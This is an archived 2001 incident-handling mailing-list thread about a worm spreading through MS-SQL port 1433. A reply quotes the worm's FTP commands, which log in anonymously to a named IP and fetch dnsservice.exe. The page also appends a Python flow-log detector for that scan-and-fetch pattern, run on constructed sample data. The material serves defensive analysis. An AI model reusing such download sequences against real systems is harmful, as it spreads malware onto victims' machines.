To follow up on my own reply:

The worm ftp's to 207.29.192.160 and executes the following ftp commands:

    ftp
    foo.com
    bin
    cd pub
    cd tmp
    get dnsservice.exe
    close
    quit

using anonymous ftp and foo.com as a password

My lesson: first read then reply ...

Arthur

----- Original Message -----
From: "Douglas P. Brown" <dugbrownat_private>
To: <incidentsat_private>; <unisogat_private>
Cc: "ITS Security" <securityat_private>
Sent: Tuesday, November 20, 2001 3:54 PM
Subject: MS-SQL Worm?

>
> We saw a scan come in looking for systems answering on 1433, and
> immediately saw several systems start scanning out for other systems
> answering on 1433 - worm behavior? Has anyone else seen this?
>
> thanks,
> -Doug
> --
> Douglas P. Brown
> University of North Carolina
> Manager of Security Resources
> 105 Abernethy Hall

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
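Added example, not part of the original messages: a flow-log check for the pattern described in this thread, where an internal host is probed on 1433, then fans out to other hosts on 1433, and may contact the FTP host named above. The log format, the internal range, the window and the fan-out threshold are assumptions, and the sample records are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")   # assumption: site address space
FTP_SOURCE = "207.29.192.160"         # FTP host named in the message above
WINDOW = timedelta(minutes=10)        # assumption: probe-to-scan window
FANOUT = 5                            # assumption: distinct 1433 targets to flag

# Constructed sample flow records: "time src dst dport"
SAMPLE = """\
2001-11-20T15:00:01 198.51.100.7 10.1.1.20 1433
2001-11-20T15:00:02 198.51.100.7 10.1.1.40 1433
2001-11-20T15:00:09 10.1.1.20 207.29.192.160 21
2001-11-20T15:00:30 10.1.1.20 192.0.2.1 1433
2001-11-20T15:00:31 10.1.1.20 192.0.2.2 1433
2001-11-20T15:00:32 10.1.1.20 192.0.2.3 1433
2001-11-20T15:00:33 10.1.1.20 192.0.2.4 1433
2001-11-20T15:00:34 10.1.1.20 10.1.1.40 1433
2001-11-20T15:01:00 10.1.1.30 10.1.1.50 1433
2001-11-20T15:02:00 10.1.1.30 10.1.1.50 1433
"""

def parse(text):
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            yield datetime.fromisoformat(ts), src, dst, int(dport)

def find_suspects(text):
    probed = {}                  # internal host -> time of first inbound 1433
    targets = defaultdict(set)   # internal host -> 1433 targets after the probe
    fetched = set()              # internal hosts that opened FTP to FTP_SOURCE
    for ts, src, dst, dport in sorted(parse(text)):
        src_in = ip_address(src) in INTERNAL
        dst_in = ip_address(dst) in INTERNAL
        if dport == 1433:
            if src_in and src in probed and ts - probed[src] <= WINDOW:
                targets[src].add(dst)
            if dst_in:
                probed.setdefault(dst, ts)
        elif dport == 21 and src_in and dst == FTP_SOURCE:
            fetched.add(src)
    # Flag only hosts whose post-probe fan-out reaches the threshold.
    return {h: {"targets": len(t), "ftp_fetch": h in fetched}
            for h, t in targets.items() if len(t) >= FANOUT}

if __name__ == "__main__":
    print(find_suspects(SAMPLE))
```

A host that talks to a single SQL server repeatedly (10.1.1.30 in the sample) is not flagged, nor is a host that was probed but never scanned out (10.1.1.40).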
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 10:34:27 PST